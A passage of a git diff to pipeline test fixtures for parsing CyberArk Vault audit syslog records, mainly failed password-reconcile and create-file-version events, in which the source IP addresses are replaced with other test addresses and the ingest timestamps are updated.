\u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "1", - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, @@ -1030,7 +939,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1043,7 +952,7 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615819476" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -1057,8 +966,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176788400Z", - "original": "\u003c7\u003e1 2021-03-15T14:44:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:44:37\",\"IsoTimestamp\":\"2021-03-15T14:44:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403111200Z", + "original": "\u003c7\u003e1 2021-03-15T14:44:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:44:37\",\"IsoTimestamp\":\"2021-03-15T14:44:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log index 0d2f4d0e96e..4fefbe43db6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log @@ -1,8 +1,8 @@ -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-11T16:50:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:29\n 2021-03-11T16:50:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PVWAAppUser\n Create File Version\n \n \n PSMSessions\n Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\n 10.0.1.20\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:29","IsoTimestamp":"2021-03-11T16:50:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PVWAAppUser","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-14T12:07:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:32\n 2021-03-14T12:07:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PasswordManager\n Create File Version\n \n \n AccountsFeedDiscoveryLogs\n Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\n 10.0.1.20\n \n \n \n \n \n Create File Version\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:32","IsoTimestamp":"2021-03-14T12:07:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PasswordManager","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"AccountsFeedDiscoveryLogs","File":"Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File 